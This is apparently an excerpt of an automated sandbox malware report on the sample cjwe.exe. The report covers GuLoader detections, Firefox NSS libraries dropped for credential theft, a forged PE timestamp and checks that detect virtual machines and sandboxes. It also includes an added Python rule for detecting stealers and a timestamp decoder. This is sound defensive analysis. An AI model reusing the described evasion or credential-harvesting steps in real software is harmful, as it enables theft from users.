Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.3.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: cjwe.exe, 00000003.00000003.279829002.000000001F3F8000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.3.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.3.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: cjwe.exe, 00000003.00000003.278406007.000000001E40C000.00000004.00000001.sdmp, softokn3.dll.3.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.3.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.3.dr
Source: Binary string: vcruntime140.i386.pdb source: cjwe.exe, 00000003.00000003.285988114.000000001E3E8000.00000004.00000001.sdmp, vcruntime140.dll.3.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.3.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: cjwe.exe, 00000003.00000003.281497361.000000001F4A4000.00000004.00000001.sdmp, nssdbm3.dll.3.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: cjwe.exe, 00000003.00000003.281820198.000000001E0B8000.00000004.00000001.sdmp, msvcp140.dll.3.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.3.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.279829002.000000001F3F8000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.279829002.000000001F3F8000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.3.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.3.dr
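Added example (not the report's or Joe Sandbox's code; the report lists no matching Sigma rule): a correlation rule over constructed Sysmon-style events modeled on the behaviour in this section. The sample spawns a second copy of itself, the child drops the Mozilla NSS libraries (nss3.dll, softokn3.dll, freebl3.dll, mozglue.dll) into an eight-hex-character folder under %LOCALAPPDATA%\Temp, and opens the Outlook profile key. Only the image path, PIDs, drop folder and key name come from the report; the event schema, the explorer.exe parent, the benign Firefox/Outlook/notepad events, the allow-list of legitimate NSS owners and the two-indicator threshold are assumptions.

```python
"""Correlate endpoint events into an Azorult-style stealer pattern.

Added example: the event schema, the benign events and the threshold are
constructed; the image path, PIDs, drop folder and registry key are the ones
listed in this report.
"""
from __future__ import annotations

import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass

# Mozilla NSS libraries a stealer needs to decrypt Firefox credential stores.
NSS_DLLS = {"nss3.dll", "softokn3.dll", "freebl3.dll", "mozglue.dll", "nssdbm3.dll"}
LEGIT_NSS_OWNERS = {"firefox.exe", "thunderbird.exe", "msiexec.exe"}   # assumption
# %LOCALAPPDATA%\Temp\<8 hex chars>\ as seen with Temp\DD440F6B\ in this report.
RANDOM_TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\[0-9A-F]{8}\\", re.IGNORECASE)
OUTLOOK_PROFILES = re.compile(
    r"\\Software\\Microsoft\\Office\\\d+\.\d+\\Outlook\\Profiles\\", re.IGNORECASE)


@dataclass(frozen=True)
class Event:
    kind: str        # "process" (creation), "file" (write), "registry" (key open)
    pid: int         # acting process; for "process" this is the new child
    image: str       # acting process image path
    target: str      # parent image / written file path / opened key path
    ppid: int = 0


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def correlate(events: list[Event]) -> dict[int, set[str]]:
    """Map each pid to the set of indicator names it triggered."""
    indicators: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        if ev.kind == "process" and ev.image.lower() == ev.target.lower():
            indicators[ev.pid].add("self-spawn")           # child has the parent's image
        elif (ev.kind == "file" and _base(ev.target) in NSS_DLLS
              and RANDOM_TEMP_DIR.search(ev.target)
              and _base(ev.image) not in LEGIT_NSS_OWNERS):
            indicators[ev.pid].add("nss-dll-drop")
        elif (ev.kind == "registry" and OUTLOOK_PROFILES.search(ev.target)
              and _base(ev.image) != "outlook.exe"):
            indicators[ev.pid].add("outlook-profile-read")
    return dict(indicators)


def alerts(events: list[Event], min_indicators: int = 2) -> list[int]:
    """PIDs with at least min_indicators distinct indicators (threshold is an assumption)."""
    return sorted(pid for pid, inds in correlate(events).items() if len(inds) >= min_indicators)


SAMPLE = r"C:\Users\user\Desktop\cjwe.exe"
TEMP = r"C:\Users\user\AppData\Local\Temp\DD440F6B"

# Constructed event stream modeled on the report; the explorer.exe parent is assumed.
EVENTS = [
    Event("process", 6656, SAMPLE, r"C:\Windows\explorer.exe", ppid=1234),
    Event("process", 6896, SAMPLE, SAMPLE, ppid=6656),        # second copy of the sample
    Event("file", 6896, SAMPLE, TEMP + r"\nss3.dll"),
    Event("file", 6896, SAMPLE, TEMP + r"\softokn3.dll"),
    Event("file", 6896, SAMPLE, TEMP + r"\freebl3.dll"),
    Event("file", 6896, SAMPLE, TEMP + r"\mozglue.dll"),
    Event("registry", 6896, SAMPLE,
          r"HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook"),
    # Constructed benign noise that must not alert.
    Event("file", 4242, r"C:\Program Files\Mozilla Firefox\firefox.exe",
          r"C:\Program Files\Mozilla Firefox\nss3.dll"),
    Event("registry", 5151, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
          r"HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook"),
    Event("process", 6060, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", ppid=1234),
]

if __name__ == "__main__":
    for pid, inds in sorted(correlate(EVENTS).items()):
        print(pid, sorted(inds))
    print("alert on:", alerts(EVENTS))
```

Only PID 6896 collects indicators (all three), so it is the one process returned by alerts(); the firefox.exe, OUTLOOK.EXE and notepad.exe events each touch one rule's objects without matching it. Any one indicator alone is noisy on a real fleet, which is why the rule requires two before alerting.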

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: Process Memory Space: cjwe.exe PID: 6656, type: MEMORY
Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
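Added example (not from the report): how the "suspicious time stamp" finding above is derived. The code walks MZ -> e_lfanew -> PE signature -> COFF header, decodes TimeDateStamp as seconds since the Unix epoch, and flags a value that postdates the time the sample was observed. The MZ/PE header bytes are a constructed minimal stub; only the value 0xAC22BA81 comes from the report. Caveat: MSVC's /Brepro deterministic-build option replaces the timestamp with a hash of the image, so a nonsensical date by itself is a weak indicator and should be weighed with the other findings here.

```python
"""Decode a PE TimeDateStamp and flag one that postdates the observation.

Added example: the MZ/PE header bytes are constructed; the timestamp value
0xAC22BA81 is the one reported for this sample.
"""
import struct
from datetime import datetime, timezone

REPORTED_TIMESTAMP = 0xAC22BA81


def build_minimal_pe(timestamp: int) -> bytes:
    """Constructed stub: DOS header with e_lfanew=0x40, PE signature, COFF file header.

    Enough for the header walk below; it is not a loadable image.
    """
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)   # e_lfanew lives at offset 0x3C
    coff = struct.pack(
        "<HHIIIHH",
        0x014C,      # Machine: IMAGE_FILE_MACHINE_I386
        3,           # NumberOfSections (arbitrary)
        timestamp,   # TimeDateStamp: seconds since 1970-01-01 UTC
        0, 0,        # PointerToSymbolTable, NumberOfSymbols
        0xE0,        # SizeOfOptionalHeader for PE32
        0x0102,      # Characteristics: EXECUTABLE_IMAGE | 32BIT_MACHINE
    )
    return dos + b"PE\x00\x00" + coff


def pe_timestamp(data: bytes) -> int:
    """Return the COFF header TimeDateStamp of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # COFF header layout: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return stamp


def timestamp_to_iso(stamp: int) -> str:
    """ISO 8601 UTC rendering of a PE timestamp."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).isoformat()


def is_suspicious_timestamp(stamp: int, observed_epoch: int, slack_seconds: int = 86400) -> bool:
    """True if the stamp is zero or lies after the observation time plus slack.

    Caveat: MSVC /Brepro builds store a hash here, so a future date alone does
    not prove tampering; treat it as one indicator among others.
    """
    if stamp == 0:
        return True
    return stamp > observed_epoch + slack_seconds


if __name__ == "__main__":
    stamp = pe_timestamp(build_minimal_pe(REPORTED_TIMESTAMP))
    now = int(datetime.now(tz=timezone.utc).timestamp())
    print(hex(stamp), timestamp_to_iso(stamp), "suspicious:", is_suspicious_timestamp(stamp, now))
```

Run against a real file, replace build_minimal_pe(...) with the bytes read from disk; the header walk is the same. The decoded value reproduces the report's "Thu Jul 7 10:18:41 2061 UTC".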
Yara detected VB6 Downloader Generic
Source: Yara match | File source: Process Memory Space: cjwe.exe PID: 6656, type: MEMORY
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_0040356D push edx; ret 0_2_00403574
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_00404C76 push esp; retf 0_2_00404C7A
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_00401A1D push 0000002Bh; ret 0_2_00401A1F
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_00401C35 push ebp; retf 0_2_00401C3F
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_004056CD push 0000005Ah; ret 0_2_004056D8
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_00401AD0 push esp; retf 0_2_00401AE6
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_004053F9 push ss; retf 0_2_00405410
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_00403AB1 push ebp; retf 0_2_00403ABB
Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_004033BE push esp; retf 0_2_004033CA
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\freebl3.dll
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\softokn3.dll
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\cjwe.exe | File created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-profile-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\nssdbm3.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\nss3.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\ucrtbase.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\mozglue.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\msvcp140.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-console-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l2-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\vcruntime140.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-util-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          Tries to detect Any.run
          Source: C:\Users\user\Desktop\cjwe.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\cjwe.exe | File opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: cjwe.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02230E22 rdtsc 0_2_02230E22
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-handle-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processthreads-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-multibyte-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-libraryloader-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processenvironment-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-timezone-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-debug-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\freebl3.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-console-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l2-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-errorhandling-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-math-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-synch-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-memory-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-string-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-runtime-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\softokn3.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-string-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-filesystem-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-sysinfo-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-profile-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\nssdbm3.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-utility-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-process-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-private-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-util-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-convert-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-synch-l1-2-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-heap-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-environment-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-locale-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-namedpipe-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-localization-l1-2-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l1-2-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-heap-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-datetime-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-conio-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-stdio-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-rtlsupport-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-time-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processthreads-l1-1-1.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-interlocked-l1-1-0.dll
          Source: C:\Users\user\Desktop\cjwe.exe | Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
          Source: C:\Users\user\Desktop\cjwe.exe TID: 7104 | Thread sleep count: 145 > 30
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
